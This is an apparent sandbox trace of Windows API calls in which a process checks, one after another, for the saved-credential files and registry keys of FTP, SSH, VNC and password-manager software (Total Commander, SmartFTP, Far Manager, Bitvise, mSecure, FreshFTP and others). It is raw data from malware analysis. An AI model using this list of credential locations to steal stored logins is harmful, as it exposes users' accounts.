GetProcessHeap () returned 0x740000 [0247.518] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x78) returned 0x757098 [0247.518] GetProcessHeap () returned 0x740000 [0247.518] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.738] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 0 [0247.739] GetProcessHeap () returned 0x740000 [0247.739] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757098 | out: hHeap=0x740000) returned 1 [0247.739] GetProcessHeap () returned 0x740000 [0247.739] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x75b6c0 [0247.740] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.741] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 58 [0247.741] GetProcessHeap () returned 0x740000 [0247.741] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x78) returned 0x757318 [0247.741] GetProcessHeap () returned 0x740000 [0247.742] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.743] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 0 [0247.743] GetProcessHeap () returned 0x740000 [0247.743] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757318 | out: hHeap=0x740000) returned 1 [0247.743] GetProcessHeap () returned 0x740000 [0247.747] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0247.748] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0247.748] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\ProgramData") returned 0x0 [0247.748] GetProcessHeap () returned 0x740000 [0247.748] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x75b6c0 [0247.751] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.752] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19fb84 | out: param_1="C:\\ProgramData\\NetDrive2\\drives.dat") returned 35 [0247.752] GetProcessHeap () returned 0x740000 [0247.752] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4a) returned 0x75a710 [0247.752] GetProcessHeap () returned 0x740000 [0247.753] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.754] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.789] PathFileExistsW (pszPath="C:\\ProgramData\\NetDrive2\\drives.dat") returned 0 [0247.789] GetProcessHeap () returned 0x740000 [0247.790] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a710 | out: hHeap=0x740000) returned 1 [0247.790] GetProcessHeap () returned 0x740000 [0247.790] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.790] GetProcessHeap () returned 0x740000 [0247.790] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0247.792] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0247.793] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Windows") returned 0x0 [0247.793] GetProcessHeap () returned 0x740000 [0247.793] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5c) returned 0x75b6c0 [0247.794] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.795] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\wcx_ftp.ini", arglist=0x19fb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0247.795] GetProcessHeap () returned 0x740000 [0247.795] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x30) returned 0x756a38 [0247.795] GetProcessHeap () returned 0x740000 [0247.796] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.797] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0247.797] GetProcessHeap () returned 0x740000 [0247.798] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756a38 | out: hHeap=0x740000) returned 1 [0247.798] GetProcessHeap () returned 0x740000 [0247.798] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.798] GetProcessHeap () returned 0x740000 [0247.798] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5c) returned 0x75b6c0 [0247.799] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.800] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\wcx_ftp.ini", arglist=0x19fb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0247.800] GetProcessHeap () returned 0x740000 [0247.800] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x66) returned 0x75a488 [0247.800] GetProcessHeap () returned 0x740000 [0247.801] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.802] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0247.802] GetProcessHeap () returned 0x740000 [0247.803] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.803] GetProcessHeap () returned 0x740000 [0247.803] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0247.804] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0247.804] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0247.804] GetProcessHeap () returned 0x740000 [0247.804] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5c) returned 0x75b6c0 [0247.805] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.806] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\wcx_ftp.ini", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0247.806] GetProcessHeap () returned 0x740000 [0247.806] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x46) returned 0x75b368 [0247.806] GetProcessHeap () returned 0x740000 [0247.807] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.811] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0247.811] GetProcessHeap () returned 0x740000 [0247.811] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b368 | out: hHeap=0x740000) returned 1 [0247.811] GetProcessHeap () returned 0x740000 [0247.811] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.811] GetProcessHeap () returned 0x740000 [0247.811] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6c) returned 0x75b6c0 [0247.917] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.918] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0247.918] GetProcessHeap () returned 0x740000 [0247.918] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x76) returned 0x757298 [0247.918] GetProcessHeap () returned 0x740000 [0247.919] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.920] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0247.921] GetProcessHeap () returned 0x740000 [0247.921] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757298 | out: hHeap=0x740000) returned 1 [0247.921] GetProcessHeap () returned 0x740000 [0247.921] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75b6c0 [0247.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.923] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fb74*=0x104) returned 0x2 [0247.923] GetProcessHeap () returned 0x740000 [0247.924] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.924] GetProcessHeap () returned 0x740000 [0247.924] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0247.925] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0247.926] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0247.926] GetProcessHeap () returned 0x740000 [0247.926] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f56) returned 0x75b6c0 [0247.928] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0247.929] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\SmartFTP", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 46 [0247.929] GetProcessHeap () returned 0x740000 [0247.929] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x60) returned 0x75a710 [0247.929] GetProcessHeap () returned 0x740000 [0247.929] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0247.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0247.931] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 0 [0247.931] GetProcessHeap () returned 0x740000 [0247.931] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0247.931] GetProcessHeap () returned 0x740000 [0247.931] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a710 | out: hHeap=0x740000) returned 1 [0247.931] GetProcessHeap () returned 0x740000 [0247.931] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75b6c0 [0247.932] GetProcessHeap () returned 0x740000 [0247.932] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b7d0 [0247.932] GetProcessHeap () returned 0x740000 [0247.932] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b660 [0248.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0248.348] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far\\Plugins\\FTP\\Hosts", phkResult=0x75b660 | out: phkResult=0x75b660*=0x0) returned 0x2 [0248.348] GetProcessHeap () returned 0x740000 [0248.349] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b660 | out: hHeap=0x740000) returned 1 [0248.349] GetProcessHeap () returned 0x740000 [0248.349] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b580 [0248.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0248.351] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far2\\Plugins\\FTP\\Hosts", phkResult=0x75b580 | out: phkResult=0x75b580*=0x0) returned 0x2 [0248.351] GetProcessHeap () returned 0x740000 [0248.351] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b580 | out: hHeap=0x740000) returned 1 [0248.351] GetProcessHeap () returned 0x740000 [0248.351] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0248.352] GetProcessHeap () returned 0x740000 [0248.352] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b7d0 | out: hHeap=0x740000) returned 1 [0248.352] GetProcessHeap () returned 0x740000 [0248.352] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3fd4) returned 0x75b6c0 [0248.353] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0248.354] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 109 [0248.354] GetProcessHeap () returned 0x740000 [0248.354] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xde) returned 0x75a488 [0248.354] GetProcessHeap () returned 0x740000 [0248.354] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0248.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0248.356] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 0 [0248.356] GetProcessHeap () returned 0x740000 [0248.356] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0248.356] GetProcessHeap () returned 0x740000 [0248.357] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0248.357] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0248.358] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0248.361] Sleep (dwMilliseconds=0xa) [0248.614] GetProcessHeap () returned 0x740000 [0248.614] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75b6c0 [0248.615] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0248.615] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\%s", arglist=0x19f90c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp") returned 37 [0248.615] GetProcessHeap () returned 0x740000 [0248.616] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4e) returned 0x75a710 [0248.616] GetProcessHeap () returned 0x740000 [0248.616] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0248.616] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp", lpFindFileData=0x19f920 | out: lpFindFileData=0x19f920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x747e20, ftLastWriteTime.dwHighDateTime=0x747e20, nFileSizeHigh=0x753f70, nFileSizeLow=0x754530, dwReserved0=0x0, dwReserved1=0x19f97c, cFileName="ը瞼", cAlternateFileName="뒭蕬͈읩䑷鋫ﮄ\x19䂑@")) returned 0xffffffff [0248.617] GetProcessHeap () returned 0x740000 [0248.617] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a710 | out: hHeap=0x740000) returned 1 [0248.617] GetProcessHeap () returned 0x740000 [0248.618] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0248.618] GetProcessHeap () returned 0x740000 [0248.618] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0248.618] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0248.619] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0248.620] Sleep (dwMilliseconds=0xa) [0248.650] GetProcessHeap () returned 0x740000 [0248.650] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75b6c0 [0248.651] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0248.652] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\%s", arglist=0x19f8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp") returned 38 [0248.652] GetProcessHeap () returned 0x740000 [0248.652] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x50) returned 0x75a710 [0248.652] GetProcessHeap () returned 0x740000 [0248.653] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0248.653] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp", lpFindFileData=0x19f908 | out: lpFindFileData=0x19f908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x747e20, ftLastWriteTime.dwHighDateTime=0x747e20, nFileSizeHigh=0x753f70, nFileSizeLow=0x754458, dwReserved0=0x0, dwReserved1=0x19f964, cFileName="ը瞼", cAlternateFileName="뒭蕬͈읩䑏鋫ﭬ\x19䂑@")) returned 0xffffffff [0248.654] GetProcessHeap () returned 0x740000 [0248.654] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a710 | out: hHeap=0x740000) returned 1 [0248.654] GetProcessHeap () returned 0x740000 [0248.654] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0248.654] GetProcessHeap () returned 0x740000 [0248.654] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75b6c0 [0248.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0248.772] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Bitvise\\BvSshClient", pszValue="LastUsedProfile", pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fb74*=0x104) returned 0x2 [0248.772] GetProcessHeap () returned 0x740000 [0248.772] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0248.772] GetProcessHeap () returned 0x740000 [0248.772] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0248.773] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0248.774] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0248.775] Sleep (dwMilliseconds=0xa) [0249.698] GetProcessHeap () returned 0x740000 [0249.698] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75b6c0 [0249.699] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0249.703] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\%s", arglist=0x19f900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc") returned 37 [0249.703] GetProcessHeap () returned 0x740000 [0249.703] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4e) returned 0x75a710 [0249.703] GetProcessHeap () returned 0x740000 [0249.703] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0249.704] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc", lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x747e20, ftLastWriteTime.dwLowDateTime=0x747e20, ftLastWriteTime.dwHighDateTime=0x753f70, nFileSizeHigh=0x754020, nFileSizeLow=0x0, dwReserved0=0x19f96c, dwReserved1=0x77bc0568, cFileName="", cAlternateFileName="͈읩䑇鋫")) returned 0xffffffff [0249.705] GetProcessHeap () returned 0x740000 [0249.705] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a710 | out: hHeap=0x740000) returned 1 [0249.705] GetProcessHeap () returned 0x740000 [0249.705] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0249.705] GetProcessHeap () returned 0x740000 [0249.705] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0249.817] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0249.818] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0249.821] Sleep (dwMilliseconds=0xa) [0249.941] GetProcessHeap () returned 0x740000 [0249.941] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75b6c0 [0249.942] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0249.943] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc") returned 35 [0249.943] GetProcessHeap () returned 0x740000 [0249.943] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4a) returned 0x75a7c8 [0249.943] GetProcessHeap () returned 0x740000 [0249.944] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0249.944] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc", lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x747e20, ftLastWriteTime.dwLowDateTime=0x747e20, ftLastWriteTime.dwHighDateTime=0x753f70, nFileSizeHigh=0x754188, nFileSizeLow=0x0, dwReserved0=0x19f954, dwReserved1=0x77bc0568, cFileName="", cAlternateFileName="螚䇆䑟鋫")) returned 0xffffffff [0249.945] GetProcessHeap () returned 0x740000 [0249.946] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0249.946] GetProcessHeap () returned 0x740000 [0249.946] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0249.946] GetProcessHeap () returned 0x740000 [0249.946] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0249.947] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0249.947] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0249.947] GetProcessHeap () returned 0x740000 [0249.947] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f54) returned 0x75b6c0 [0249.948] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0249.949] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\mSecure", arglist=0x19fb64 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 39 [0249.949] GetProcessHeap () returned 0x740000 [0249.950] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x52) returned 0x75a7c8 [0249.950] GetProcessHeap () returned 0x740000 [0249.950] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0249.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0249.951] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 0 [0249.952] GetProcessHeap () returned 0x740000 [0249.952] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0249.952] GetProcessHeap () returned 0x740000 [0249.952] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0249.953] GetProcessHeap () returned 0x740000 [0249.953] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0249.954] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0249.954] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\ProgramData") returned 0x0 [0249.954] GetProcessHeap () returned 0x740000 [0249.954] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f58) returned 0x75b6c0 [0249.955] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0249.956] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Syncovery", arglist=0x19fb94 | out: param_1="C:\\ProgramData\\Syncovery") returned 24 [0249.956] GetProcessHeap () returned 0x740000 [0249.956] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x34) returned 0x74da68 [0249.957] GetProcessHeap () returned 0x740000 [0249.957] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0249.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0249.959] PathFileExistsW (pszPath="C:\\ProgramData\\Syncovery") returned 0 [0249.959] GetProcessHeap () returned 0x740000 [0249.959] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0249.959] GetProcessHeap () returned 0x740000 [0249.960] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74da68 | out: hHeap=0x740000) returned 1 [0249.960] GetProcessHeap () returned 0x740000 [0249.960] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0249.961] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0249.961] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0249.961] GetProcessHeap () returned 0x740000 [0249.961] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b6c0 [0249.962] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0249.963] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\FreshWebmaster\\FreshFTP\\FtpSites.SMF", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 59 [0249.963] GetProcessHeap () returned 0x740000 [0249.963] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75a7c8 [0249.963] GetProcessHeap () returned 0x740000 [0249.964] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.115] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 0 [0250.116] GetProcessHeap () returned 0x740000 [0250.116] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0250.116] GetProcessHeap () returned 0x740000 [0250.117] HeapFree (in: hHeap=0x740000, 